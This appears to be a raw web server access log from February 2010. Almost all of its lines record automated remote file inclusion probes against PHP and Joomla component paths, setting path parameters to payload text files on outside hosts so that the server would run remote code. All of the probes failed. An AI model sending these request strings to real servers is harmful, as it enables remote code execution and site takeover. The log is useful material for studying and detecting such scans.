91.121.105.125 - - [21/Feb/2010:06:18:26 -0800] "GET /logs/access_100210.log//phpSecurePages/secure.php?&cfgProgDir=http://www.ckinfo.net/bbs//ikhy1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [21/Feb/2010:06:19:34 -0800] "GET /logs/access_100118.log/http://www.import-et-export.fr//components/com_virtuemart/rs.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
91.121.105.125 - - [21/Feb/2010:06:20:04 -0800] "GET /logs/access_100210.log//phpSecurePages/secure.php?&cfgProgDir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:20:08 -0800] "GET /logs/access_100206.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:20:09 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:20:09 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:20:11 -0800] "GET /logs/access_100124.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:20:12 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:20:15 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
217.212.224.183 - - [21/Feb/2010:06:20:54 -0800] "GET /robots.txt HTTP/1.0" 200 36 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.puaga.com"
217.212.224.181 - - [21/Feb/2010:06:20:55 -0800] "GET /polteaser/ HTTP/1.0" 200 1553 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:20:57 -0800] "GET /logs/access_100203.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:20:57 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:20:58 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
91.121.105.125 - - [21/Feb/2010:06:21:06 -0800] "GET /logs/access_100210.log//phpSecurePages/secure.php?&cfgProgDir=http://www.ckinfo.net/bbs//ikhy1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [21/Feb/2010:06:21:48 -0800] "GET /logs/access_100210.log//phpSecurePages/secure.php?&cfgProgDir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [21/Feb/2010:06:22:04 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [21/Feb/2010:06:22:04 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [21/Feb/2010:06:22:04 -0800] "GET /logs/access_100201.log//components/com_forum/download.php?phpbb_root_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:22:39 -0800] "GET /logs/access_100124.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:22:40 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:22:40 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
210.205.6.233 - - [21/Feb/2010:06:22:53 -0800] "GET /logs/access.log//components/com_forum/download.php?phpbb_root_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:23:07 -0800] "GET /logs/access_100203.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:23:32 -0800] "GET /logs/access_100124.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:23:32 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:23:33 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:23:44 -0800] "GET /logs/access_100111.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:06:24:27 -0800] "GET /logs/access_100126.log/errors.php?error=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:06:24:27 -0800] "GET /logs/errors.php?error=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:06:24:27 -0800] "GET /errors.php?error=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [21/Feb/2010:06:24:44 -0800] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.ckinfo.net/bbs//ikhy1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [21/Feb/2010:06:24:47 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.ckinfo.net/bbs//ikhy1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [21/Feb/2010:06:24:47 -0800] "GET /logs/access_100121.log%20%20//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.ckinfo.net/bbs//ikhy1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:06:25:09 -0800] "GET /logs/access_100126.log/errors.php?error=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:06:25:09 -0800] "GET /logs/errors.php?error=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:06:25:09 -0800] "GET /errors.php?error=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [21/Feb/2010:06:25:12 -0800] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.ckinfo.net/bbs//ikhy1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [21/Feb/2010:06:25:12 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.ckinfo.net/bbs//ikhy1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [21/Feb/2010:06:25:12 -0800] "GET /logs/access_100121.log%20%20//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.ckinfo.net/bbs//ikhy1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [21/Feb/2010:06:25:36 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [21/Feb/2010:06:25:36 -0800] "GET /logs/access_100201.log//components/com_forum/download.php?phpbb_root_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [21/Feb/2010:06:25:36 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.197.121.122 - - [21/Feb/2010:06:25:36 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ticcamp.co.kr/hex/idlab1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:25:36 -0800] "GET /logs/access_100206.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:25:37 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:25:37 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
217.197.121.122 - - [21/Feb/2010:06:25:40 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ticcamp.co.kr/hex/idlab1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.197.121.122 - - [21/Feb/2010:06:25:40 -0800] "GET /logs/access_100204.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ticcamp.co.kr/hex/idlab1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [21/Feb/2010:06:25:50 -0800] "GET /logs/access_100124.log%20%20//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.ckinfo.net/bbs//ikhy1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [21/Feb/2010:06:25:52 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [21/Feb/2010:06:25:52 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [21/Feb/2010:06:25:52 -0800] "GET /logs/access_100201.log//components/com_forum/download.php?phpbb_root_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [21/Feb/2010:06:26:13 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [21/Feb/2010:06:26:13 -0800] "GET /logs/access_100201.log//components/com_forum/download.php?phpbb_root_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [21/Feb/2010:06:26:13 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [21/Feb/2010:06:26:16 -0800] "GET /logs/access_100203.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [21/Feb/2010:06:26:22 -0800] "GET /logs/access_100124.log%20%20//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.ckinfo.net/bbs//ikhy1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [21/Feb/2010:06:26:24 -0800] "GET /logs/access.log//components/com_forum/download.php?phpbb_root_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.117.70.36 - - [21/Feb/2010:06:26:24 -0800] "GET /logs//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.117.70.36 - - [21/Feb/2010:06:26:24 -0800] "GET /oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.117.70.36 - - [21/Feb/2010:06:26:25 -0800] "GET /logs/access_100202.log%20%20//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [21/Feb/2010:06:26:26 -0800] "GET /logs/access_100118.log%20%20/index1.php?x=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [21/Feb/2010:06:26:26 -0800] "GET /index1.php?x=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [21/Feb/2010:06:26:26 -0800] "GET /logs/index1.php?x=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [21/Feb/2010:06:26:29 -0800] "GET /logs/access.log//components/com_forum/download.php?phpbb_root_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [21/Feb/2010:06:26:41 -0800] "GET /logs/access.log//components/com_forum/download.php?phpbb_root_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [21/Feb/2010:06:26:42 -0800] "GET /logs/index1.php?x=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [21/Feb/2010:06:26:42 -0800] "GET /logs/access_100118.log%20%20/index1.php?x=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [21/Feb/2010:06:26:42 -0800] "GET /index1.php?x=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [21/Feb/2010:06:26:44 -0800] "GET /logs/access_100210.log%20%20/index1.php?x=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [21/Feb/2010:06:26:44 -0800] "GET /logs/access_100122.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [21/Feb/2010:06:26:49 -0800] "GET /index1.php?x=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [21/Feb/2010:06:26:49 -0800] "GET /logs/index1.php?x=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [21/Feb/2010:06:26:49 -0800] "GET /logs/access_100118.log%20%20/index1.php?x=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [21/Feb/2010:06:26:51 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [21/Feb/2010:06:26:51 -0800] "GET /logs/access_100121.log%20%20//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [21/Feb/2010:06:26:51 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [21/Feb/2010:06:27:05 -0800] "GET /logs/access_100210.log%20%20/index1.php?x=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [21/Feb/2010:06:27:15 -0800] "GET /index1.php?x=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [21/Feb/2010:06:27:15 -0800] "GET /logs/access_100114.log%20%20/index1.php?x=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [21/Feb/2010:06:27:15 -0800] "GET /logs/access_100210.log%20%20/index1.php?x=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.117.70.36 - - [21/Feb/2010:06:27:17 -0800] "GET /faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.117.70.36 - - [21/Feb/2010:06:27:17 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.117.70.36 - - [21/Feb/2010:06:27:19 -0800] "GET /logs/access_100202.log%20%20//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:27:27 -0800] "GET /logs/access_100203.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:27:27 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:27:28 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:27:29 -0800] "GET /logs/access_100122.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
82.179.244.69 - - [21/Feb/2010:06:27:29 -0800] "GET /logs/access_100201.log//modules/vwar/admin/admin.php?vwar_root=http://www.rwies1406.de//sb/kontol.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:27:29 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
82.179.244.69 - - [21/Feb/2010:06:27:30 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.rwies1406.de//sb/kontol.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:27:30 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
82.179.244.69 - - [21/Feb/2010:06:27:30 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.rwies1406.de//sb/kontol.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:27:39 -0800] "GET /logs/access_100206.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:27:39 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:27:40 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
218.38.243.44 - - [21/Feb/2010:06:27:43 -0800] "GET /logs/access_100118.log%20%20/index1.php?x=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [21/Feb/2010:06:27:43 -0800] "GET /logs/index1.php?x=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [21/Feb/2010:06:27:43 -0800] "GET /index1.php?x=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [21/Feb/2010:06:27:44 -0800] "GET /logs/access_100114.log%20%20/index1.php?x=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [21/Feb/2010:06:27:49 -0800] "GET /index1.php?x=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [21/Feb/2010:06:27:49 -0800] "GET /logs/access_100118.log%20%20/index1.php?x=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [21/Feb/2010:06:27:49 -0800] "GET /logs/index1.php?x=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [21/Feb/2010:06:27:51 -0800] "GET /logs/access_100114.log%20%20/index1.php?x=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.117.70.36 - - [21/Feb/2010:06:28:01 -0800] "GET /logs/access_100115.log%20%20//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:28:10 -0800] "GET /logs/access_100203.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
222.237.78.176 - - [21/Feb/2010:06:28:35 -0800] "GET /logs/access_100127.log%20%20//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:28:40 -0800] "GET /logs/access_100124.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:28:41 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:28:41 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:28:51 -0800] "GET /logs/access_100127.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
62.117.70.36 - - [21/Feb/2010:06:28:52 -0800] "GET /logs/access_100115.log%20%20//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:29:11 -0800] "GET /logs/access_100122.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
64.6.109.50 - - [21/Feb/2010:06:29:11 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
